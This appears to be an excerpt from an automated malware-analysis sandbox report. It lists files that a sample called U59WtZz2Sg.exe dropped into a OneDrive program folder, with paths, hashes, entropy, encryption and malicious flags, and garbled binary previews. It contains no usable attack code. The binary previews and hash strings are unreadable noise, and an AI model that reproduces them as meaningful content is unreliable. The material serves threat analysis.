SHA-256:	C64F5A1CCC3220EA777234ECC5EE2D3F302917C4298C5719153C5FEA4B9FBE99
SHA-512:	7491A414E91EEDCE02ADF9FCD6CD1B95DCDD9E19DBB77128DA96707FF25D357EAA517B5B2F582D6EF94E43E2195F2E2C8254F47AE05A654FC4AB826485A82C10
Malicious:	false
Reputation:	unknown
Preview:	/***~...#<....R..z.&.^.mukx.....f...l...p....k..G.!yu...U.IC$[.....>...4."...._b.v..R..7V.a.g.f.~.vgP1.k.s...1..m.y..y'.T...!....3....Uk.6.G(-....Z.."......U]..m..k._.]....\...FR.E....^..P...r+...s..J9.Z.....g../o..^`....Dm...`%S.!.+A'.5...e....xF.=......A....S_........f..#.s..!hY..u$..".......vX...w}P.\|.yK.......&..3......5.y....g..`F..{.../....3;.:..!.(e.c....`.%&..`...H.x.....d...n.{.<.D.2..]....~xK....]..x..w.-g.)......W.o0.[.......p..T.l..q..A."..`b......W.Z.6...[.1X-...h.UM.Z.......4.(rC..c...(........l>...>h.aNx..N ..{z..\..T......`l...`.../.....m./..g.U$;.....Z..$.X;...GJ.:..GM....A c...._9....x"v.N3...L.p;D6.V2.!U3D......l.+..#...a.a..#...=~..f....).s"..J.@3WJ\|..\|44..D...oM.....w..=......g.:.-I.+..5b.r.qD.A."....M..M.......4..X........w..+v...^..yn.D5e..k`w.m`L9..Y...C..l...:...OuMn...._.O.BL.'.............-..g:X........_nT.+.r.V.....W.T\|..#......A0...ehz[z..D!...).Y..gp.J3.G..Okx...wYr)'Ba.h/........>..y.8L...2..m8

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\TextField.qml

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.947919068800108
Encrypted:	false
SSDEEP:	96:c1F2tX+hKMTF/H1sUgEeco69YN4aWNn/pW/KcI1BfHH:c1F2tO8KFf1sUDo69YN+/s/K3BfHH
MD5:	28D46FD2162A540869D49E87CA3EBFAE
SHA1:	58F181606B70FDB7C93BC5A2C1786292AF40375D
SHA-256:	72A60F07ADA5D2AC433F3590EE2418F069DC51DB8781035FC67420542F3C6E79
SHA-512:	FF25CFBB5A1AC522DB3C494E3F879638652752A4A769261CF4E05AD8E14B6DE3A17E05FA86AF51C22F17DF4AA287FBEF052D2B63AC6708230BBDA8066D762AD9
Malicious:	false
Reputation:	unknown
Preview:	/***5..3V.R3O....$y.=..f.GT..`...U.!I..t..@.S...i..s8....#v..9..O..T...2...x..Qf.5.....w.T.3.nm. .q.@.dC...QS...7.u..@y..'..7&p...`..m.@.vG...._.7.@..[.9..A..\|....bM.......R.T..(.R.G...x...$s$.f.......(..s.H..Cy...gh.....,...Qe..N.V....&...g#..}.r..K?..D!1.......W.....gT1..C..@..7.D%.Y..y...w...<L;"....{.O........:.D.4..).@I..a....FE~..(.f.>.H.}.\|..B`y=.K.f...#...i.)....r\|I5..?r.R.\..^&d2_....FF.?0.K.#.1..5.-.{....[.;..J.(..o.K...{c.{....\|!.2..v........j...Lm..[4..l....!.G.{+..z...3`..G.......5$..G4._..^T.&.W.&U.2\7i...1.:......;..AN..=......Ne.X....L..J\4.\.....I..\.eC/^......6W.......Zr.1...~.....d..>.+..].2Be.ej.t...I.-r.<.....G.$.c.R.e..S0..[.E.6..unF.n......b.v4A:.\P....Gm.(...C.P!_\|. K.C;.'..?..J..T..f-.'.W..H..f..{..R..`_.1.....p.k.{...\..,..W[O......l....{.0N+w.U.MW.D.....N...ln....m..G.;..H....G...`......Q...'g.cY....k..a.R..b....jf.J.4....\|f.....#...a..@...Mo1M5...r....`a.%.B..&>...\8..f.f .Fv4.\...}.....>.I.\|..U..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Controls.2\plugins.qmltypes

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	93199
Entropy (8bit):	7.997644077401256
Encrypted:	true
SSDEEP:	1536:OJSu9vzgohyAaC5LoRtugdMl8yDczQW0mZ/jKf8hNuV/qCOm:OJS8x6uywDczP9U83uJqCOm
MD5:	13A5641DD8C3B61D75EF9B9FCC29544B
SHA1:	C4F10D1B4D08E69DDE3A57B537971CD8990277FC
SHA-256:	979BCA0500529F21002A2EA7FFCDBF2C3C63290D9FFCD7B4A1F57DEAC9EE8813
SHA-512:	1860CB30918AA87AA586A26A3373E2E7559F3D72B283178ECD0DB4FC3358579E092E338C1D57F7DD5EFDAD82A1B720EC6C21E0C32CC2F5E74221527BE5FC8E91
Malicious:	true
Reputation:	unknown
Preview:	impor..9.In.. ......-....).ynUR...&..8.UO.....`..........o.J...meA;.(0.........Z...7-.R9x.u....7.@...hu........}.].b...#....b.......>.DJ>/Uav...S..>)....v..X.._...3..9.......ds..oTzMK"\.xB.d4S.}9...G.OE...8..g..o....r........y?.r.......g."Ds.k.vh.6.N.1.......bS..>.u~..cD..YK."..4...\.....'+...h.f.Z..!..q..z.U..)u.Q+_...<...0@b._E'.......g....).C.T....F..Z.<......b.k..0E.p.-...\|#..v\.........T.....n...Lp.. >.@.&pk..?.X.a.p....]...?.X.q......S...F...I...Z....D.X~.u............9.+..82u...2.M..J..`.P..(.._...+v...J.@E.....d.X..'.....~.A.`.~..V@. ..3..g.K..c1...5W../....~'4..Yp.....~.d......{.+....q...O&....Rw/o}.J.i$U/..G......p....@.$I%.r...\G.S......r3....[e.g...........[_4?;.9..y.Pc.k,..w..u...k...g_Bf#..v...\|S.+.V.^.1..EM..C.2<.H.\.,-..?..@.V..y.ie........je.....q...M..`!9...F%..<....c}......L..1.`....%m..nPy...4...]R!.O..........Y....<.N.pz...&.."r.7NO....9.-.`.{.i.Cc*C..d'8cxU...X........4>^.i...q......z!..1.=...O.S6s.+Na&Ek..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Extras\plugins.qmltypes

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	30213
Entropy (8bit):	7.993934136962237
Encrypted:	true
SSDEEP:	384:4w/rMMla5vd2iUbkxDZDlhy1Q4BJ00W/rh35qgiSeUGjEaaoMhyZ2wSjQcm1pgqj:ngM0tMtgx/54lWjzJr6EV10EwGvs
MD5:	16035314223B9E6410DD4022A93CE864
SHA1:	58FB77E46D03236EEED300026DBCA3FCDC3620DC
SHA-256:	99359F643FD7F22EBC931B55082644744F8A2C0CEDB88EE87B5623CA3077877E
SHA-512:	C42344B1F4492CA2171548FFF54C7AF9B07236B204B4233E414FE95FDFEF5B8A418BD0D6951F36022C80EBF3FAFB6EE351FA26B32C5158D744F1509EA63730F7
Malicious:	true
Reputation:	unknown
Preview:	impor.@.J.+..$h.Q,.l..M#.\..o.\|..>....h...#{.6`qc..a.....y..Iu...........[.l...p..I0..%imr()_g{.?.O.>.V.8s.....#./z..BP;..t..>o7...`Z.d..._...l..QM=.&{...3;#.:...&..G4.U.o.....h..S..A...U....p..xQ(.P.h.WW..n._.#.....J.....l^..b [.. .43....Y.\|..6.\|..rZ.x.Y..).y@...0.....W..l..ob......1Kib8....l..n:)...H...@3..d.....\|F...Uf)..X......3..Z._..Z..../.I.4....S4~......Q..x....(.TD.Q....o....h...H.^...kl....J...6g..}..[Os0B.....N...u'.&.F..W.^.Q!.S.0.J.K._....=E5..0z.l.4W4.......`F'.Q.....7v.......E.Wt......\|..=..8....c..o!.A...<.g...?.].n...x..P..!..fW{.-`....S._1a.Y......I..k^...Y....(UD..u0t. J3..^.>.....,iB...h.f....O..U.w<kj}R..f).i.j..[..C...,P..mU.0.e..f....D..X......A.[$Xg.p......s].B..d....s....n..n]/Ml.:.%~.m.q.... ...u..-M.&........'Q...'.g. b@.E....U...'.n.)zRB.....&..5....+..0...........s}F..\.~.......o...A...RiY.g.i..n.F.P.....Moy.\|..3.......Q.O"Q.1B..s.;U..[.....2cLK6@4.\..Mj.xs......}....y.zJ..p"Rw.x.....D..aELw.L.^.i..#.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Layouts\plugins.qmltypes

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4124
Entropy (8bit):	7.955402358201686
Encrypted:	false
SSDEEP:	96:CcxUegiOi0iIOcGGS77lwECmoDbH/3y6VGLH2yoKTKa16:hSeyi34G/7lwbmoPfV4bG1
MD5:	58E29220E938A135551422973932A782
SHA1:	E0D459A3C72E9736BBB2039E009D0A327754681A
SHA-256:	103869D8B0DE10D29E74A4FDEA645FF84D1004B1AA8193B51045B8A44E36E280
SHA-512:	0BF72B0A03F9BA56483492195878D54401E46CFA661D11AA9AC42C5F890D5E5131548B4F911E217207D184D7E66B959910466B634ECA3EB8BA8726BD16EC203D
Malicious:	false
Reputation:	unknown
Preview:	impor....".E...1...T .1.......a<.DJ.1.!..i.....P.?.dv.(j..n.Cpc........X.~y...W_....E%.u4o.....-.6.d.f.<.^b...3.......z.M....o..G;....qh!..x.U\..&..~p..wY.z..,C.......+.l.Z..g.........4......d......vR.g....3..kR".....:.....H..{.O.._&f...1.DK.I.C<..S....>G..?..r.LY.@~b..-..Q...B.:wu.y.!.F;.$[..6.~./.i6Q..g.B.O...M...F.](V...`Z.;...]...[...l.8M..sU<XL.w]Ny.....Iv.`.(.9A.96.!...+..(..r}U.5c...L....HB)..TtS..5.6(nam.f...........u....0........?...$h...C..._....=e..n).[dq%)n\|.. ...h..TH..J..i`A.Hv.IS}.^....r..i..y;...~6d...........{.YO!...H......q.di4=h...r tU.LN....[.Tn6JR.SwW..q...d..?(..JhwN1(x.HG.N?.q{...tl..R..;.!.X.(...z..Z..(..X...B.h.W.l....x...lP..@e..}3..4D..8:....\n'f......lt....t.......~~..{A.F..g...k=..gO@cf.*.......]..p....os&....xR.~...Db..Z.Jm.-...>P....~'_...A.d.2Z,.... \|4H...tqL....8..,#..'.m23..86..tAw/[.!.v:......a..m..j....x.........yCi..u..x.0.x.>..%...&~..I.b.N..JU..C).5.N........w..43.:..-G.,]...<.k)..VwV.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Templates.2\plugins.qmltypes

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	69247
Entropy (8bit):	7.997540527113058
Encrypted:	true
SSDEEP:	1536:ohOpl1owNhKdoH74m9WvZ7QlXYCgaubMUltD/f1X5X+:xLOwNqIt9WvZ78gTbtnTN5O
MD5:	8A474EF44F2811209F36CD35A251E725
SHA1:	969066B87DC65C4B226F0D84A8C385CE349CEF1F
SHA-256:	8546F9D8037AAB82B40978ECB56EA2102C9A0BB93D10200CEAD329577819854B
SHA-512:	64564AA8586BBA05A2CDDE9711544F92282C9B90ECA01E5A6B30975D912620DFFF01CC1719BF3BDCD7C842095BDCEA6BBF1DB185FE264324CFD44122981B4F8F
Malicious:	true
Reputation:	unknown
Preview:	impor3....u.......3..:.4/.^....J.3..j..#..e...l..wu..C.c}$>Z....V.y...'.7]......U..!S......n..T..}.zIftO.pek...D.$4,..:s.[ ...4UM..~A..../..v.=Oo.a.Q....W-Q...Q..Y#il....0E.;..}...y.&.....#8.....K.....w...p.{a.G.T.g<m.M...}.S.C0H..Z>.8n...F.M.%.i. ..0.P.N....rNv...v74.0.h....Y.K.....z.q....=.`.@GP.\ML...E....p........[.C..2..Z...v8^.U....d[K.{.k..)a...3......\.+K.yZ.EQ...r~..B.'[<...0..T.\..ec......6...b......j.....F...1.p.K..T.v.@..TX.<..k.&./.0.0..Z..6..Qt..r..M.....:g.{.\........O.1.+.x.;'~.x=.9.4...Jl..8.&.+.u..."...@k(....9..}.\|..F......../...r6F...i.}..P..V..V...gL.+.\]......Q.{.6,W..Bi!..[...x.D.."..1\......z............>.....`P.....RW..r.1.D...!M....[..E6...?.Q.:F<r._m.(.].....g<...9.x.r=...D.#5?.....~.../zm,QB..&...\.....<I]V....#..(..8..LcLi..+..)V..=.1.o..i...'._..pKz..<...j..w..c.P.nu.........utYY....-y+\w.VX.N].....N...#....Y.b{5..q{X.T.j.....^....@...R..7.-..;.+....-/..M-?..T...{...a...........,.j-.....e...N..............0

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\qml\QtQuick\Window.2\plugins.qmltypes

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	13194
Entropy (8bit):	7.984859288533521
Encrypted:	false
SSDEEP:	192:cZDlGBhvjo5xh9nXzWvbM5jXy6VkihgbCe6cmk6/VEAPL94Qvm7p/BciCqtM1lvu:KlSvjoXPDO6Vk0g/v9AZR4FNSirmfvu
MD5:	2A1A145F92BB064282348DB74596E6A2
SHA1:	5A31B4B214ED78B42B4E9B90A69B4496D0C4C3E3
SHA-256:	2B4EDCBAFA4DDAB1BE9F1DF7AB4BCA1E9BE126ED76C78DA8E7787C85021A5E6D
SHA-512:	304E75974D031912010B4665D0E95C6FEF94D6F6504ED431653880B750E4B6D3A87E1CB361A16CDD83D13244A9F081018F678CA3FE1DE040A675CC8021CC602E
Malicious:	false
Reputation:	unknown
Preview:	impor.\|....n.t.kS..W@e&/..zsh-.r...d...p._"W../...N..-..x..G].Ywzn[...Y.n........j<.)..$....4.V....'..f.w,Y.2.VBG.~G..Q....J..`@....W.f\K.,R.....O$R+....\|.......r;7VQ...o.....bTO...#....<^.`,..aX=,.z...k...A,..E\|v..KE.W"..{......).....a...."XCE2&.u.!.a..Q.f.O-H...Wbr..[..c.M.i...%.....}vj-;.x.j;.^.....Q..#Bh.CRc.......c.T.y....E\|.D.]y...`...z...oD\|.......j.k.8.........#x....h..FwOB[..X..GS.........#..&.....:...?8H9.7.f.Jw...n.....e..;....k...\|..X...&O.y..E....8z.Mv.O....._7m..Z.'35.N...i.V....j.7....a....8D`....$05Y.f.;..2@UO;.......Y........P...........O.Z....g...\,....!..pd. T=.......w....zH...4.@......T..........I..J...p..K..>......[.....Z.....b.T.............H....9.>...].^..!.}za. .&......U.V...+`E..%.F./..&.=....... i..!.B0c=.92....nz.......~....5...iU..u......A...U.4......\5a.<v9_[....kc....C5>..od..g;.J......u..,x.S........0.......I....I........J..f.P...s{.....*.-..[....[..~..C.&].G.."...?z...br..MY.L.D.+e...fJmg..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quc\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	182406
Entropy (8bit):	7.893930945027993
Encrypted:	false
SSDEEP:	3072:lUQs+sDf9inLHHXpNn+RURUsjZgdO922gAyUnZbixnl2725jqizCWBwuZjwob/Y:l9s+sDf96LH3rEURpd0l2XClvlmiA
MD5:	FEE307EC334BB1382AE2C9145E392073
SHA1:	375A793810F8B7378F79AC20A25DFC8DA4863197
SHA-256:	2E05F1BB911A2FD6A9B2A03CE26ACFDCB27EAEB75DE24A87B01CCE6F6C9495D8
SHA-512:	C566F43D4F931210E5FCF49E84208EA7AEBF1239499A698D4DE1081739BEFF33EF0C3546DEC7C9447B160CFCBCDB9DDD922CF6412E15339433687ACFB7E5A015
Malicious:	false
Reputation:	unknown
Preview:	MZ...5v..".%.v..F.w`d.c..y...I....L\+.X..ytC....j.x..v..L:..W9.....,....7;.2...g..+..84Q...._......C&... ....q.fs.+. .l<.2J.#.c..>.mDi3...(1lFV...q7.,"0.aMH~...g...r.d#.o...I.R.l..r...7'...S..E.b..".i.[..sL+.H.s42.)...{.5).J..Q.b.U.e.2'.yER........3.UZ.."..y.%.e....o.....x....L...5.......c;..?...cFZ...]._.\|J. ........e......M.#..2..y..4e.YW....}QR.{.'...E.....:a.u.~.+.4..\|gv.hW`?.....Z..+..\|.(..%<..1....<.....R$...\|=O?.B).....H.Wn......vX_....fl....O.G..y...R..b......U..#&Y....wyT;.......:....z:4....}.x...F.p_.n)..gT.I....3.Y..k.F.i.............a.<...$+~a.N..0Y".1..%I..~..G..{......@....Z.K{?....$x...[&.j9.............e..$Y.@...^....../\|K.c'....?.].`C1!..E9..;...Q.C....j.(...Bb..w..u1g.g..g/l.ZnD...c...A[...$.+~K....x..IR..LB..O............O..O..........0D:.Yv].;$ <...qy.Fj....4...h....c.C........Y.....Ls..6.W0.4...;.\|....x.?4...v....9.g~..f^..0s<.I.,8.Gq....!....J...M.s....t.T..m....r..72..".?.g.._..y....$0....y+Z...D..%..'........\|H.w

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\quz-PE\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	210582
Entropy (8bit):	7.559316998003665
Encrypted:	false
SSDEEP:	3072:ytokZ7mas+dB9BU/+Cf2MqgiPiC+KJvOMY1+6KoikPmMFb:y26mas8Mfj+PiNKJvU+6Koigfd
MD5:	AF5128F0781B150EE6FD9848AFCB4842
SHA1:	08900AA07F4FF17ECE2D94EC30EDF2DB26EA5099
SHA-256:	66584F0588BF17185CB3C0F655DADCA18FE7373DF87790008E1F6BC3F82C9D92
SHA-512:	0805854FC860C71C9F229264D88778752DBA89C8E14EDCE25BBB33BA6DABA013514F0BE1EA2CDB519F86E325CE142262D56730E8F1E80750209BFAA89E1E9115
Malicious:	false
Reputation:	unknown
Preview:	MZ...j....#..j_..Q...0].h.,`....aqm.2J_.7\|v...2\|.s..;......`.2;..R.{-.....U.8l.:.&.D.~..@+Uzmm..&.e. *Y.^Yp[`.?....T.i....lL.&..?.B.X./<.J..f.<..q...w..&=(:....&....;.h.s.L ......k#.4E./ty.X-.(r.....d....k."h..u.zZ.Q..%<.../.cdWiHe.l..a..A.C.TT,.i`.........`1.R...:.......=..uAHS..RS6.....p=....:...A..< ..ND..M.X.......o&`..,....YT7"..i......E..x.K.dN.&...7.}..........LL.F..y.`..ux..Z..!..Ep......L...cB...e.-V....A..h.C.r.Xk._2.h%..4.J. ....k~.9.-U`.S...}...{R......J....B.M.mSa...V..[...&....n.Y.....tE_=......%...........k.".....>...i.G.h4...t....6....y......P../...U..OY.m9.....O.q.F.._..d.],p..t;rM..a.b....y.F.gT.XY..^H...e.......&R.R!V..p..Z(E.].............].~B.r.7.Z...o....H.-$..J..Yd..H<.+=...#.R7._..q.;{lT..h...8moK..<.()..mb......w....N...i...-..wU..s.t.(U.G<w...m.h.m-.&.z.i..e..s.Au....p.....{ ..n...m..\|-..O..^X2..).O......a.O.n.E.Yi..G0G...md4.M......P1.;N."...q.mm"...&.J^.&)-.&/.\y.W.9./fY....)n.....8.o..hd....E......p..].....Q

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ro\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	208006
Entropy (8bit):	7.613333947203497
Encrypted:	false
SSDEEP:	3072:vPcknUDD0umJ1v0qU2pUE900HuUGVtrm0No3I4UVR5GlLTEQzdIVeaAYSddiau6y:dKYusQVtrmOrVR2TYMYSddTy
MD5:	9F0DA37E6CBBC1B93B4D0306AF587683
SHA1:	42200E8387F5633F64B8EED680647BE643C192D9
SHA-256:	ADA54B132D7E861A639CA5ACF67EE41EBBF7BF01BE3C2AD12916CEB198636969
SHA-512:	5E8668EB179F59FBCB4E518C905A89564500EB2B7A8E38697A5843B9515AA62A0359F43B270A7DCB8C44A2B59848A5019B6B9887D1C94A219FB620AB8D8B2782
Malicious:	false
Reputation:	unknown
Preview:	MZ...B...._...o ..h:..[.n.J.H..wZK...7f. ...V....\|..Vyw..vu.F..rV{...6.}...........3..4........Gw....[\|6^.PO&...9W^{..Y.X.......pdJ`.$.).HB.....i.vw.^........!i.i.g.k......Gt....dN...ej..!B."..r..Iq..kx..lX...^.M.z....Ke+..r..8(..\|w......Fol.64....N%.x......62J...$... ........#......Y...n'..........\....~#..x...pg..M...Wo..I................7n...Me...q....\|+.p..+O.EN..~<.N.N....J...."..........1..)......+n.C.G~.c......_8.`...z<b.Q........).;........1..5..8.G.z.;..I9.X.P.p..rD.y..#.?.a #...........b.1......}.oi.....-r.<..........,..5...-a?E.k.T....../!......k~i...? .\i<...f.&...N.T..Dz.2.L.I.-...^..iY.7...1g...B.9.....?%.c...V.pn..........a%...n.\..V.w........A......d.~....F..4.rkOB..5..................4....C.i.k.jD...d.t.+......cm.{t..R.p..x..c...(..Kz..^.+.j.t.g.Da..%..H.%.X.w.2.....z...).n:...LH..EM. Ua..sR.9.......H.j.;.q.k...Tb...?@h..@C....R.{.E..."._tJ.FX....1.JY&..U'...Bd..Lv]...MF.....@.........p.....:...T..E.p.o..1...z.L.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ru\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	206462
Entropy (8bit):	7.697889475062796
Encrypted:	false
SSDEEP:	6144:qJ4S2rAPqukoRvuomkBni1z0qNtXbAoEEp:+4SiWquNvlmkdD8tLHEEp
MD5:	8B5AB036AD210A31311E5C6E8D5A3F51
SHA1:	30096464537B50EBDDB21BA6F28443AF8DCD70C3
SHA-256:	70F461FBAD3F30CF5E971042CD3B9D0B92F4A7D850C3D55B4E868C47A2DF97A9
SHA-512:	861131BB87BE9FC274E173189698E63BD826792AD9C3C7D6D88624365855CC88B3904E07F0E77F670A920A9390F71CB4DC49CD4656741185AD0E1880F8BB324A
Malicious:	false
Reputation:	unknown
Preview:	MZ......J.d$~Wo&Zu......9....,.CoC.......!7.a...&.....X+.....\5.\|........'c..#.6...PMY6Bh..^3..@...........a.E.._/.....q.....w..3..A.0o.1...../.{:v.w..e.......%..U.kW?..[..V...U.....V.k....E`..n.../...{`..!?..!.Q.b`.X..p...;..^...`...Y....8..?.I.6..[..V..A3.aS....H..h.vO`'...Cm...B.".n.......' V..T.h.._g.....%7......x.........V..%(.E...n....Jt-s,.....4i-...p.v.n.\.o.Wy...........hi..e.<8...;K$.y.....'.u.'..XroEK..;....m.....I..za.h.......'.T..N.\|..:.....<....E.%.d...W............& q.....7...I.5..Ao.=..........;..+/....VLeLw....S..+.)6.87E..<.L3..6. .......(.UW..............v..t...I.l.T..G&...}.dZ\$..o....p...ua.Hs.K.].{..........e..i..T..HN.o.]......W\.R;s..1'!.....Ag."..3.....5.,..A.Ek.......#....~....i...MO.t.../ZG`k...c.........i.p......"B....B.P.P.:..L..4+.-.`.k?.......^.d....%.cr.#...M..W...\.Y..DH..=.......h......\...{C....V._.~...l..B..(."'i5.oT'\|C....\|.S=O.!(...o^o.r.=U.`....4j.a..........`=*..J..,X&.C...f....kow.0.m....7..?v..==

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	160382
Entropy (8bit):	7.997164493232545
Encrypted:	true
SSDEEP:	3072:T2sk+yzkOMsf9hafhRt/AOiKbvooC0EZpE5FnApGGf6F:Ty+yJMCIRmXEwoC0H5upz6F
MD5:	9E81CBEB7382B1CC4BD558D1639BBAA2
SHA1:	16E9D88037CB4D9207317B203E2D32BE7FE95C94
SHA-256:	A51DB4D1E9DEF4BB449936694009BB6170F64D1315432723C5D4FD8101CF0C83
SHA-512:	ECBE7D0FC867D36508C75D47F0EA1F8C1BE4C1F6FE4BF68AEE89409370F838281219DF38D825CE9136AEDD3C8B41C397809784C4468A6B4CD71B50ACA61A8BF9
Malicious:	true
Reputation:	unknown
Preview:	MZ....!-cj...x.!E.....k.aW^.y...XU..eqfV.:....a.P......m....=o\x<wH........Fz....-.!..<n.C.. .....}~..h.3X....KB..........I......2.!.r<&.)x[M....8.. j.u..)h+y,.>..i..MEx.3...,.9........T.<Ey...ej2.r.L..V....8.;..'O...C...i.ec.eb`.3;..S.k.\...6....=...L..9.h.....q~&`......&..%.#.@...(v W...0.O....c.._Q.._..c.%......)8&Vxsa....s:TFQb...K.E...u....2...>.'.. .....F ..i.}y\.X9c...@4G....n..T.......v..k.jhV...Q.c.....pl....z./.7..........N8..re.z...).....B/..ok..p.K.........A..f....n....z(r.9.i.q.6..{..@\E.....Ds<...}.} .8Z.9.........<.C&1..i..w...........+/..CogM..m........+t....DW...........0.6..cg.gV..wD....6\.mm.c.1..?.`..'%j[..`P.;.T...i.....Z/...I...Q.w..V...?.ag....._.D............o.z.?..~QE..n.N.............u...uU...bV..^7.0.[E=C.K_...Y.q..gz...F..../....7.I....2.;.....*,.......R6?.....z!x..G.yg.9!......nz..nW.....].../.n....LA`.D.P...36..O2....FY2..&.y...B...9.......J.'.f.4-.g....p.s'}.....r.....X.9<..,Z..CAYQc\,s...)..g+.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sd-Arab-PK\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	200614
Entropy (8bit):	7.745397660613624
Encrypted:	false
SSDEEP:	3072:p6U2cGlpd2MgOXqeO7Y90D0Iwg19yLknkKRHZ9dLNYUMloFVdLV99BfDvA:oWO6xM+0Ix19ywkEVLNN6oFVh0
MD5:	2C3A714C800427B3A451B78377D35006
SHA1:	64E5A3915AA114B6DA72F0779616846FE047667F
SHA-256:	93AC2A25B050223B2D735BE509763D6B596F1563750822924684653021A97482
SHA-512:	575BE80D65F50957A58BA8BE7C799A8FBB80568CFE83602719F77EA099F4B52FB3024441A811787D5EDFADCB643536ED28D360C846C37D26ECFB380396B66C28
Malicious:	false
Reputation:	unknown
Preview:	MZ.....x:.0v.$........\|......Q.Hw....lQK...). Y.o.].=..G%...=k..W...a....z.`....h.>E.v.R...G:.(.0.#t..U.....<.A..W.A./...fin.u...........hS&^.I..\.1..-Z.{.'.m.h+Q8....Q:....M.4.H....!.:.w....Y.}.E'...z....J..N.B.3.>}V...[.>..M.....<n.6.z.$.O...;#o.m...Cn...j....+.o.!..b..h.Q.vQ&........e.[...v"Py.;...!...c........<uA.....~!\...k.[N7.G}t.mj...Rj.E..L......5d.p.D1.S....,N..h.(8..6@.M3^........9..LQ..O..5..!..#$u....,\|...... ..q.6N)............Si.'.Z..GN.qt..........&<U(HQ.\...!.....omE..<../....7....H..X.q...lB.....=.....[.~....:7...~..n...$.G.RnfYib\...m...z!...ta.B.../.%.z......m..yx5qh.-.v.]B@...~2..L.q..... <...~..{Hg..y..4g$.m....,+...w......^.S=....d...H~..W.f H(..F.v{........;..I..8....3>g>$...MF...0..d..%t\|.o."..M..E..8\|.o....T...B....QkA..A8...*.t.d3{...........OG.."...[,.....z...O...I.Hk.>.....K...,...XP.a..).d!\|..q..+M;.~[..o.\|....m.'DJ..5...qp....F..(.s....{..6.;...K.Q~6..D.).\..j.I...."9..V.....w..k..%B.s......]..`4.N

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\si-LK\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	191110
Entropy (8bit):	7.84854720647989
Encrypted:	false
SSDEEP:	3072:jAa3DzbfLFvIVyym3TzcbnCp7rgwCl9FDxdvPMik1WeaJHfHTl2DxiCOirl7W62+:nn/S/mDzcG9Ry9ZnMiAWHJHfHO/Oirlv
MD5:	0FC0D00715D5EDE0B101A60FB037B84F
SHA1:	C91FFAC55E2F877EF5C390CED4EAE6510E65F03F
SHA-256:	FE0EEADC78D1AD8EA916511AFBF906CB7060DEC4A081297DD8311B4BEC73325B
SHA-512:	853DF000C3B7F8C24894319BBEF5515E0B1589023602D0628A942F3CC0C28D2215B39328C595FEFF719058AE8819EB3A135A9C196C9EB3A43112D42D3970CB70
Malicious:	false
Reputation:	unknown
Preview:	MZ.......g..A7.CBL...O......0.i.~YIWR.N..jK.\|.c....:.......,]."#.B....7.._;...G<...I.R..h..b.....pT..I]7..J^%h..;..~..4..8.(......H...[.\=.)`...H..r.........}y4u.u[........H..m... ...U.....E..9....(._."T.[........1Z.Ii..S.7.}.-..!.s.6`.u.O..wf3..F.l.&..9.3.<......0`...@.gC.=Z...DH......(.rk.......=..`.J...........K.....F....U..h...........3.+.[KL..........j`C..1e.03A..r.xs.R.;.p......O.....x.wB.I}.S2.c.h^..ff..&....P....Cz....~..........%..I84...'z...$........E...a$B.......G.O....c..:p4...V..?.{.....d[.h..-.D...>LD,.?D\r..B.0.o.(...R...a^R?.Ss.`<....$..i.q:.a..=l..jd6...tt`v...Dc...w.\|&.~.;......0On3Y=../..._".y.zT....V3.Vt.#.s..'.\|z^.`...\|.J.........#../..dF....'A..........._....V......E.j...r..h".../t...L#ux]F#mb..Si.^l.........#.j.B!..JS..<)'.,.E..}d.<6.....Dvf.......;j..C#..%..Vy...H...)q....[H8...........L...K"$..VW.M../.I..0x.8,.11.-'....U.\|...J.......2....ft.A../.0.h=...,.B.-)}...H.......y.G.4hU;..7^..... X...jxg3..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sk\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
